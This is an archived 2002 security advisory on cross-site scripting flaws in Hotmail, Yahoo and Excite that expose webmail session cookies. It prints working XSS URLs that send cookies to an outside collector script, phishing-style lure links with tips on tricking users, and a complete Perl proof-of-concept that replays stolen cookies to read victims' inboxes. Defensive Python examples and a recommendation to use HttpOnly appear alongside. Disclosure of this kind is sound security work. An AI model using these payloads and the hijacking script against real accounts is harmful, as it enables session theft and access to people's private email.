[NEWS] XSS Vulnerability in Major Websites (Hotmail, Yahoo and Excite)
From: support@securiteam.com
Date: 11/14/02
From: support@securiteam.com To: list@securiteam.com Date: 14 Nov 2002 15:44:15 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
XSS Vulnerability in Major Websites (Hotmail, Yahoo and Excite)
------------------------------------------------------------------------
SUMMARY
All of the above-named sites use cookies for their mail services. A
vulnerability in their web sites allows remote attackers to make a victim's
browser reveal the mail cookie to a third-party site when the victim requests
a specially crafted URL (one containing a cross-site scripting payload).
DETAILS
Hotmail example:
Hotmail uses *.msn.com for its services, so with an XSS bug on any
*.msn.com host the cookie for the email service can be captured. The example
XSS is in the 'article.asp' script on 'www.accesshollywood.msn.com'. This
script doesn't seem to filter anything, so an XSS-URL is:
-
http://www.accesshollywood.msn.com/news/article.asp?art=><scr!pt>window.open('http://host/cgi-bin/rompigema.pl?'+document.referrer+'%20'+document.cookie);</scr!pt>
Yahoo example:
The Yahoo mail service uses a *.yahoo.com server, so an XSS on any
*.yahoo.com server will give up the cookie of the mail server. The example
XSS is in the 'login' script on 'login.europe.yahoo.com'. This script does
seem to filter < and %3C. However, Yahoo uses the same script for multiple
sites and shows a picture for each site, and the picture's file name is taken
partly from a request variable. By changing the picture name to something
bogus and appending an 'onError' handler, malicious JavaScript can be
inserted without any < character. An example XSS-URL would be:
-
http://login.europe.yahoo.com/config/login?.intl=frx%22%20onerror=%22plof:window.open('http://host/cgi-bin/rompigema.pl?'%2Bdocument.referrer%2B'%20'%2Bdocument.cookie)%22%3E&.src=ym&.done=
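The Yahoo case is the classic lesson that removing '<' is not enough once untrusted input lands inside a quoted attribute: a quote character is all that is needed to add an event handler. The following Python is an added example, not code from the advisory or from any of the sites named in it; the `<img>` template, the picture names and the URL-encoded input are constructed stand-ins for the login picture described above.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed inputs (not from the advisory): a normal picture name and a
# value that closes the quoted attribute and adds an event handler, URL-encoded
# as it would arrive in a query string. Neither contains '<' or '%3C'.
BENIGN = "frx"
ATTRIBUTE_BREAKOUT = "frx%22%20onerror=%22x"

# Constructed stand-in for the per-site picture markup.
TEMPLATE = '<img src="/img/%s.gif">'


def naive_filter(value):
    """Mimics a filter that only strips '<' (raw or %3C-encoded)."""
    return unquote(value).replace("<", "")


def render_naive(value):
    """Puts the '<'-filtered value into the attribute otherwise unchanged."""
    return TEMPLATE % naive_filter(value)


def render_encoded(value):
    """Context-aware fix: also encode quotes and '&', so the value can never
    terminate the attribute it is placed in."""
    return TEMPLATE % escape(unquote(value), quote=True)


class _AttrCollector(HTMLParser):
    """Collects attribute names the way a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)


def attribute_names(markup):
    """Anything besides 'src' means the input broke out of the attribute."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.names


if __name__ == "__main__":
    for render in (render_naive, render_encoded):
        print(render.__name__, attribute_names(render(ATTRIBUTE_BREAKOUT)))
```

`render_naive` yields `src` plus a second `onerror` attribute for the breakout input, while `render_encoded` yields only `src` with the quotes kept inside its value.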
Excite example:
The Excite mail service uses a *.excite.com server, so any XSS on a
*.excite.com host can be used to obtain the mail service cookie. The example
XSS is in the 'spmywaymaint.jsp' script on 'sports.excite.com'. An example
XSS-URL would be:
-
http://sports.excite.com/jsp/spmywaymaint.jsp?ru=X%22><scr!pt>window.open('http://host/cgi-bin/rompigema.pl?'%252Bdocument.referrer%252B'%20'%252bdocument.cookie);</scr!pt>
General:
One of the problems with these bugs is that the XSS bug sits on another
server/service, which is probably maintained by different people than those
who maintain the mail service. Because of this, fixing the bug can take a lot
longer than it needs to. Bugs in other services can make the mail service
insecure, and because there are so many services on these sites it is usually
easy to find another XSS bug.
Exploit:
The XSS bugs can be exploited by getting people to click on a link in an
email.
Example links:
Hotmail:
- <a href="http://www.accesshollywood.msn.com/news/article.asp?
art=><scr!pt>window.open('http://host/cgi-bin/rompigema.pl?'+
document.referrer+'%20'+document.cookie);</scr!pt>">Britney Nude!</a>
Yahoo:
- <a href="http://login.europe.yahoo.com/config/login?.intl=
frx%22%20onerror=%22plof:window.open('http://host/cgi-bin/rompigema.pl?'%2Bdocument.cookie)%22%3E&.src=ym&.done=">Britney Nude!</a>
Excite:
- <a
href="http://sports.excite.com/jsp/spmywaymaint.jsp?ru=X%22><scr!pt>window.open('http://host/cgi-bin/rompigema.pl?'%252Bdocument.referrer%252B'%20'%252bdocument.cookie);</scr!pt>">Britney Nude!</a>
The string 'Britney Nude' will trick some people into clicking the link.
Other strings, such as "This email could not be shown because of an error,
please click _here_ to try again", will trick many more users, because many
people click such links without even thinking.
Other ways to exploit this are:
- Giving people links through instant messengers.
- Putting JavaScript in any homepage, which will open the XSS bug. This can
  be done, for example, in:
  - Poorly filtered forums
  - Poorly filtered guestbooks
- Giving people a URL which will redirect them to the XSS bug.
People can think of other ways as well; in fact it isn't really safe to surf
the internet with a web mail account if the servers aren't fully secure.
All the links above go to a Perl script. This script (rompigema.pl) receives
the cookie and the referrer of the 'victim', and then makes a request to the
mail server to fetch the front page, the inbox or an email of the 'victim'.
This script is meant to show how easy it is to abuse other people's cookies;
of course one could also put the cookie into one's own cookie directory in
Windows or something similar.
NOTE: The rompigema.pl script will only work when people click the link in
an email (not with the other ways described above), because it uses the
referrer to make building the request easier. The script could be altered so
that it works without the referrer. An example of such a script is the
fragile.pl script written for the Lycos XSS/cookie bug[0].
Rompigema.pl:
#!/usr/bin/perl
#
# Multiple XSS/Cookie Problems
# Proof of Concept
# N|ghtHawk
# nighthawk_at_hackers4hackers.org

use IO::Socket;

# OPTIONS
# 1. See Frontpage
# 2. See Inbox
# 3. Read An E-Mail
# 4. Only save Cookie
$option = "3";

# PATH
$path = "/tmp/mirrors/";

# The query string carries "<referrer> <cookie>" as sent by the XSS payload.
$cookie = "$ENV{QUERY_STRING}\;";
$cookie =~ s/%20/ /g;
if ($cookie =~ /http:\/\/(.*mail\.(.*)\..*com)(\/[^ ]* )(.*)/) {
    $host   = $1;
    $type   = $2;
    $req    = $3;
    $cookie = $4;
    if ($req =~ /ArdSI=(.*)&ArdSI=/) {
        $ardsi = $1;
    }
}
if (!$cookie || !$host) { &no_cookie; }

# Per-service request paths and regexes, selected via $type.
%msn = (
    1    => "/cgi-bin/hmhome",
    2    => "/cgi-bin/HoTMaiL?curmbox=F000000001",
    filt => "<a *href=\"\/(cgi-bin\/getmsg\?.*)\">",
    name => "class=[^ ]*\">(.*@hotmail.com)<"
);
%yahoo = (
    1    => "/ym/Welcome?order=down&sort=date&pos=0",
    2    => "/ym/us/ShowFolder?box=Inbox&order=down&sort=date&pos=0",
    filt => "\/(ym\/ShowLetter?.*)\">",
    name => "<b>.* (.*\@yahoo.com)<\/b>"
);
%excite = (
    1    => "\/splash.php?ArdSI=$ardsi&ArdSI=$ardsi",
    2    => "\/folder_msglist.php?t=0&m=0&ArdSI=$ardsi&in=1",
    filt => "(msg_read.php?[^>]*)'",
    name => "<b>Hi (.*)!<\/b>"
);

$req = "$$type{2}";
if ($option == "1") { $req = "$$type{1}"; }
$data = request($host, $req);
if ($option == "3") {
    @datar = split(/\n/,$data);
    foreach $line (@datar) {
        if ($line =~ /$$type{filt}/) {
            $req = "/$1";
        }
    }
    $data = request($host, $req);
}
&out($data);

sub out {
    my ($data) = @_;
    @datar = split(/\n/,$data);
    foreach $line (@datar) {
        if ($line =~ /$$type{name}/) {
            $name = $1;
        }
    }
    if ($option == 4) {
        $data = "$name\n$cookie\n";
        $name = "cookies";
    }
    open(FILE,">>$path$name.html");
    print FILE "$data\n";
    close(FILE);
    print "Content-type: text/html\n";
    print "Location: http://www.dwheeler.com/secure-programs/".
          "Secure-Programs-HOWTO.html\n\n";
}

sub request {
    my ($host, $req) = @_;
    $sock = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => "$host",
        PeerPort => "80",
        Timeout  => 30) || die "Could not create socket: $!\n";
    print $sock "GET $req HTTP/1.0\n".
                "Host: $host\n".
                "Accept: image/gif, image/x-xbitmap, */*\n".
                "Accept-Language: nl\n".
                "User-Agent: Pr00fOfConcept/1.0 \n".
                "Connection: Keep-Alive\n".
                "Cookie: $cookie\n\n";
    sleep(4);
    recv($sock,$data,200000,0);
    close($sock);
    return $data;
}

sub no_cookie {
    print "content-type: text/html\n\n";
    print "<h1>No Cookie or Referrer found</h1>\n";
    exit;
}
Patch:
Well, it's up to the sites to patch this. It would be a good idea not to
put insecure scripts on a server which uses the same cookies as your mail
system. N|ghtHawk also really thinks an idea like HttpOnly[1] would be a
good start in getting rid of all the XSS bugs.
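The two defensive points in this section can be checked on the cookie itself: whether the mail session cookie carries HttpOnly, and whether its Domain attribute scopes it to the whole parent domain, which is exactly what let an XSS on any *.msn.com or *.yahoo.com host read the mail cookie. The following Python is an added example, not code from the advisory or the sites it names; the Set-Cookie headers, cookie name and host names are constructed.

```python
# Constructed Set-Cookie header (not from the advisory): a session cookie
# scoped to the whole parent domain and readable from script.
WEAK_HEADER = "SESSION=c0nstructed; Domain=.example.com; Path=/"
MAIL_HOST = "mail.example.com"  # constructed host of the mail service


def parse_set_cookie(header):
    """Splits a Set-Cookie header into (name, value, {attribute: value}).
    Flag attributes such as HttpOnly appear with an empty string value."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_set_cookie(header, service_host):
    """Returns the findings relevant to the cross-host cookie theft above."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append(f"{name}: no HttpOnly, so script on any host in scope "
                        "can read it through document.cookie")
    domain = attrs.get("domain", "").lstrip(".").lower()
    host = service_host.lower()
    if domain and domain != host and host.endswith("." + domain):
        findings.append(f"{name}: Domain={attrs['domain']} sends it to every "
                        f"host under {domain}, not only to {host}")
    return findings


def hardened_set_cookie(name, value):
    """Host-only (no Domain attribute) and HttpOnly: the cookie is returned
    only to the host that set it and is invisible to document.cookie."""
    return f"{name}={value}; Path=/; HttpOnly"


if __name__ == "__main__":
    for finding in audit_set_cookie(WEAK_HEADER, MAIL_HOST):
        print("weak:", finding)
    print("hardened:", audit_set_cookie(hardened_set_cookie("SESSION", "c0nstructed"), MAIL_HOST))
```

HttpOnly only blocks script from reading the cookie; a script injected on the same host can still issue requests that the browser sends with the cookie attached, so it limits what the exfiltration in this advisory can do rather than removing the XSS itself.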
Links:
[0] Lycos XSS/Cookie Advisory:
- http://www.securiteam.com/securitynews/6R0041P60Q.html
- http://www.dsinet.org/?id=3005
XSS:
- http://www.cgisecurity.com/articles/xss-faq.shtml
[1] HttpOnly:
- http://msdn.microsoft.com/library/en-us/dncode/html/secure10102002.asp
Meaning of Rompigema:
- http://wwwtios.cs.utwente.nl/traduk/EO-EN/Traduku?rompig%5Eema
ADDITIONAL INFORMATION
The information has been provided by
<mailto:nighthawk_at_hackers4hackers.org> "N|ghtHawk" Thijs Bosschert.